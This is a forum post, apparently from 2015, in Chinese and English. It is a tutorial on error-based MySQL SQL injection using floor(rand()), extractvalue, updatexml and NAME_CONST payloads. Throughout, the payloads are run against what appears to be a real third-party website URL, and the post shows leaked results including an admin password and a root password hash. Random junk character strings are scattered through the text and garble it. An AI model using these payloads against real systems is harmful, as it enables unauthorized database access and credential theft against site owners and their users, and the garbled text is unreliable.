|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:) B) V/ F0 a: {* ?+ B
首先进行正常查询: mysql> select * from article where id = 1;' N% J) [3 l& {4 ^
+—-+——-+———+
' A# S" v) I7 Y4 m1 G7 E| id | title | content |
# p' T2 F- h% a+—-+——-+———+
% z, H- K! V& B- }7 v3 X| 1 | test | do it |2 c& z% F! |+ |( p
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);* U- y' k5 ^* b( x" W, w
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
2 @# r. K' y& B+ K# h8 D# @2 f例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);6 c) a+ ~2 A1 s$ V
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));: q0 B# D, f2 b; B/ X1 {0 Y7 S
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
1 ?0 }* C3 ~2 |6 {/ l& O测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
+ r7 l5 u+ a! D/ D1 gERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
$ U* J0 R) E' m# N, E% J/ e3 F8 O, I- O4 t; ?, O2 x
再收集: . S) N& y5 H- X0 C0 `) @+ Y
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
2 s) l, c% h" ]( o+ e3 a) ]2 u+ z N: T+ c8 I. d' ~
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’. A/ I+ O2 }8 e- C! p( g
9 C- m) s9 |9 _1 W( G6 t
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)2 w, Z& E& D) ^$ A. R
. Q" F5 \: s6 X% |
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 7 M/ A% P; ]& c9 ~2 f, r
! C3 J! ~9 x8 o& vMYSQL高版本报错注入技巧-利用NAME_CONST注入& ^ A, l% V. I7 G+ y5 F
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. $ g: j1 A- Q, F; {# ?
# e+ O. N: u" R2 U6 S' n
& V9 ^3 V0 O! s0 @$ ]相关信息! _/ E; O F# L B. x) C
4 `; Q' u5 {6 ]' N7 M' Z
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.. S4 u6 x3 {0 x4 c' @" q8 C
9 j( \9 }- O6 {+ X1 _: KCode:
r! D8 A" ~7 ^4 ONAME_CONST(DATA, VALUE)! Y- E7 p& j: J/ G' i5 B8 j* @+ v& I
- l% o7 p9 i* A6 X" } P! S8 h# x
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.7 z) v' F/ K& }- c2 D3 g- \ [
@# V( q# K7 i2 Y2 C5 q
SELECT NAME_CONST('TEST', 1)% X& {# G% R* ~! d% i; P
; o# D4 P! C# M: b& {9 i( \& W; t
- k" p+ c4 N* f; x0 M
$ t1 K4 {1 S5 u. ~* z/ P4 F|---------------|: T' J& j- A; s0 U" Z
| TEST |
4 E3 F( c, _1 q% e1 L9 E, e| |/ G B0 U' D! u
|---------------|
2 `8 Q8 ~7 @+ p" o$ A& u/ G| 1 |# d7 z( p# T5 N O& R" W$ H! U/ U
| |# I# S9 P! p7 k/ D1 i, k$ N' ~, o
|---------------|& F# s* p, P7 c' `
7 ?$ K4 w' N3 M, E! m( q9 O6 s5 l0 Z+ r
, a g$ @$ ^. |1 W- j5 ~5 Z7 D8 k
! n( A/ u; C2 K
http://dev.mysql.com/doc/refman/5.0/en/m...name-const4 @( [5 A3 W# A. n1 d1 V
Intro to MySQL Variables
$ T _. f- G% {2 k. A% {
$ B; O+ y$ V4 k. [$ V* I+ e0 ]7 QOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.( D1 Q8 Z% d# f' [8 Y$ y4 U3 m+ J9 T
: H$ P3 A A( r; f% [+ WCode:
4 c5 A6 }& s3 \' v" U1 Shttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2614 i* i1 P& |* \& ]+ Z5 _) S
3 u* O' @; }9 Q2 t+ z, H; O$ I8 b: \3 E: L6 x
/ ^9 H3 h- Q8 [; J( s* G
3 }' M: f; }$ \- Q1 Q4 V6 x4 l1 P" U" K/ |
Code:' j+ N( x& M! V
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--4 w I5 u1 }7 S' }: [7 [' e
* M, O6 y+ u; f& h5 K- v
& x' S5 ] j S* S) l
VAR = Your MySQL variable.& D' V" ^# ?# L8 H" r8 I
' n8 l' C. [3 v
MySQL 5.1.3 Server System Variables2 n; w8 `2 s& A' K- ]7 E" s
) C3 B. K+ i9 m; e/ z( z
Let's try it out on my site..
* T% T! j& u. O4 K/ [3 ~) J) ]; K5 j- D) C
Code:% {0 w( y1 L" W1 j7 r3 J
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
; T+ Q" ]+ s/ x, K: u! y/ L+ \$ K- ?- |4 I2 E S
Erroruplicate column name '5.0.27-community-nt'; b0 b$ _& k/ ~# w" I" _6 v# j
. w' {/ a# X6 `# H" t* G( g
1 M2 c, j4 ^$ h. U1 Q: D
+ x$ |3 A6 y) u6 k+ Q* |+ J5 D7 G6 r0 ?+ V7 G) |; j( v8 U- T6 t% ]
/ F: _3 T+ d7 y- ?' l5 ^
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...( T5 H5 E3 ?& f; c
' V3 r* L( p3 S. G" bData Extraction
j% g* d/ m. C! o* v# F7 E% z& l( X3 F L% v- S( s6 @ c7 F
Code:2 q4 q, K9 q' |- q& a8 [) j
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--: Y9 T; U" c" b# \5 s4 }4 Q
& `5 a2 q8 h0 k8 e9 J2 j% I1 j# c4 g
We should get a duplicate column 1 error...
2 |& ^/ R$ E9 X# O" o3 S; g3 P O
3 W' B& R/ m) M3 W7 tCode:. l+ @8 i7 Q4 E0 l( }
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--6 F* w N2 O6 C8 d% _ d
4 O) T9 X% e# A. M, t7 [6 `; r; GErroruplicate column name '13 k9 S* a% Q, V. n
7 D" G- D& z* U9 U3 \9 M v+ \3 `! g% W5 u( H
- L- Y2 R; H: S3 s, K) Z( ?4 P/ B7 U6 x$ Q
# e- [ o6 q& \( ?( Z- |
9 R, ]6 V8 v& s& O7 _$ J) r$ pNow let's get the tables out this bitch.. L8 l: i) r \: e- z2 ~
( B5 e5 _; k" P' fCode:& r$ n C0 K. l2 n
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--* I4 J7 |0 v6 e4 D/ C- x( k3 w
0 [$ U- w6 Z+ F- l/ P0 U9 H' `7 {! O5 w( Y! m2 u9 M
Let's see if it works here, if it does, we can go on and finish the job.
+ h) Y: G: [7 I$ E3 Q4 j' u, M5 i9 g$ O& D
Code:7 Y x( @% [6 o9 O' B. u, E5 V2 q
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
. n$ j5 H' S5 k+ h4 O, z/ k1 M
. d: G7 s* P( A8 _1 Z9 T2 o
/ [3 U' D- g4 d! D* _% P8 JErroruplicate column name 'com_admanage
" n4 G9 g' h ~* ~" X" u* v; M+ z- m( n+ |. z2 M/ @
" O% G; A, {1 O) C. ]& k8 N/ |; n* P. D! x# S
: D' c. s* ~2 S; k8 `
+ a+ n% F7 {( N+ h/ r4 ?
$ o$ F1 \( U; nNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
4 R8 l6 y3 ~" p+ m2 X% g
8 J3 A% q c7 Q5 @; L1 ?Let's get the columns out of the user table..6 |% G: V: \8 `# @$ ?
! S7 z2 t2 s ACode:
$ d% H, W, e/ P n+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
* G" \' C, |9 G( a+ G K
8 R# @5 G3 I3 Q6 ~. c, ~. F2 d |' n4 i$ _# H7 ~
So mine looks like this, and I get the duplicate column name 'Host'.
& c1 m/ B: v4 o7 `
1 \; M8 u/ s6 |, m1 f9 Z' s0 I0 qCode: f. q. C! d" m$ ~2 x& [
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
& I( N6 _6 `5 ~, `! W: A: E' ~! O( J! C$ ^# }; X' l' f5 v
Erroruplicate column name 'Host'# d! X! m y! m; t" X5 X
0 b. n) c6 ?! M* b0 v( |4 N2 s
# _7 u1 @+ v+ T# a$ d4 `' o. p& q# q2 X1 H
/ \; X& Y I l; w! Y# m% g! u1 I& h4 w3 u! a
: i3 X$ ~3 t. k: J% R$ ?8 ~" K- x
Woot, time to finish this bitch off.
: `9 A6 O* H; [/ l
1 ?- t8 s* L; |& d6 J% `9 nCode:5 J% u5 g% l( A" F
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
4 p* C1 p7 D7 @+ ~( J# N2 f6 ]" x: I
, z, c2 I2 [2 U4 M- M+ FSo mine looks like this...
2 {6 y. b3 r* ?8 [
! f. F; L; H" C- a# JCode:. U2 x9 j4 H6 k' J
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--. c+ I& F* g; X/ @$ j+ p+ S% w! ], u
9 I- g7 R* Z* {* o1 @Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'8 u. F, {% P' ~
" _2 K- P$ @8 a. C" `( u+ o6 H
0 k2 o; S9 d: [; w ) h3 K1 z8 a& X+ d4 _
& ^, J# U* K4 J3 J1 Y. V6 q
- a1 R2 L4 u0 T' F
7 |$ M& S+ e* V5 D+ d, HAnd there we have it, thanks for reading.
1 }' U4 e( S3 O" s8 K) F2 ]* }
5 ]3 m, V* p; o9 k( F o |
发表于 2015-11-11 19:03:37
收藏
支持
反对